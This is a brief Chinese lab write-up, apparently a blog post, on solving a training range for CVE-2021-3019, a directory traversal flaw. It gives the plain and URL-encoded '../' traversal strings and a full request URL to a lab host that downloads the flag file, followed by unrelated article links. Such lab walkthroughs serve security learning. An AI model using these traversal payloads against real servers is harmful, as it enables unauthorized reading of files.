春秋云境CVE-2021-3019

1.阅读靶场介绍

这里博主捕获到的关键字眼是

目录遍历漏洞

2.启动靶场

如下图所示

3.poc

这里就是构造目录遍历路径

../../../../../../../或者..%2f..%2f..%2f..%2f..%2f

这里博主构造完下面的路径弹出一个文件下载

http://39.106.48.123:39628/..%2f..%2f..%2f..%2f..%2fflag

各位可以参考参考

相关推荐
momodira87 小时前
暑期安全短视频大赛线上投票制作教程
安全
humors2219 小时前
新手笔记本/路由/手机安全问题小记
安全·华为·电脑·手机·路由器·笔记本·tplink
廋到被风吹走10 小时前
【AI】从“卖能力“到“卖信任“,合规与安全成为新战场
人工智能·安全
FrameNotWork10 小时前
HarmonyOS 6.0 文件加密与安全存储:从哈希到硬件级密钥管理全链路实战
安全·哈希算法·harmonyos
栩栩云生12 小时前
命令行的门槛从"会写"变成了"会拦"
安全·ai编程·命令行
GitLqr12 小时前
别再盲目复制了:彻底搞懂 CORS 的本质与那些“神坑”
安全·http·面试
xian_wwq13 小时前
【案例分析】Hugging Face生产基础设施入侵攻击分析
网络·安全
云水一下14 小时前
零基础玩转bWAPP靶场(十三):SQL 注入(GET/搜索型)
web安全·sql注入·bwapp
2401_8734794015 小时前
如何识别C2通信中的恶意出站IP?IP离线库+威胁情报融合方案
网络·tcp/ip·安全·ip
OpenAnolis小助手15 小时前
Anolis OS 23.5 发布:全新平台支持、DDE 桌面升级,安全与多架构能力再度跃升
安全·操作系统·龙蜥社区·anolis os·anolis os 23.5